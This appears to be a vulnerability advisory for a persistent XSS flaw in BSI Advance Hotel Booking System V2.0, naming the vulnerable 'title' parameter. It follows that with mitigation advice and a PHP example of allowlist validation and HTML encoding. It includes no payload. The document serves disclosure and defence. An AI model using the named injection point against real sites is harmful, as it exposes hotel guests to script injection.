Vendor: Hotel Booking System
By: Angelo Ruwantha
CVSS: 8.8 HIGH
Persistent XSS
CWE: 79
Product Name: Hotel Booking System
Affected Version From: V2.0
Affected Version To: V2.0
Patch Exists: YES
Related CVE: CVE-2014-4035
CPE: a:best_soft_inc:hotel_booking_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Archlinux
2014
BSI Advance Hotel Booking System Persistent XSS
A persistent XSS vulnerability was discovered in BSI Advance Hotel Booking System V2.0. An attacker can inject malicious JavaScript code into the 'title' parameter of the 'booking_details.php' page via a POST request. This code will be executed in the browser of any user who visits the page.
Mitigation:
Input validation should be used to prevent malicious code from being injected into the 'title' parameter. Additionally, the application should be updated to the latest version.
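One way to apply this mitigation to the 'title' field, as an added example that is not the vendor's code or patch: validate the value against an allowlist on input and also HTML-encode it on output, which goes one step beyond the input validation named above. The allowlist contents (assuming 'title' is a guest honorific), the function names and the sample inputs are all assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumption: 'title' is the guest's honorific, chosen from a fixed list.
const ALLOWED_TITLES = ['Mr.', 'Mrs.', 'Ms.', 'Dr.', 'Prof.'];

/** Validate on input: return the title only if it is on the allowlist. */
function validate_title($raw): ?string
{
    if (!is_string($raw)) {
        return null; // arrays (title[]=...) and missing values are rejected
    }
    $title = trim($raw);
    return in_array($title, ALLOWED_TITLES, true) ? $title : null;
}

/** Encode on output: neutralise HTML metacharacters in element or quoted-attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample submissions standing in for $_POST['title'].
$samples = [
    'Dr.',
    '<b>not an honorific</b>',
    ['unexpected', 'array'],
];

foreach ($samples as $raw) {
    $title = validate_title($raw);
    if ($title === null) {
        // Reject instead of storing; encode before echoing so the rejection message is safe too.
        $shown = is_string($raw) ? h($raw) : gettype($raw);
        echo "rejected: {$shown}\n";
        continue;
    }
    // Values are still encoded when rendered, in case stored rows predate the validation.
    echo '<td class="title">' . h($title) . "</td>\n";
}
```

Encoding at render time is what protects visitors from values that were stored before validation was added, so both steps are needed for a persistent XSS.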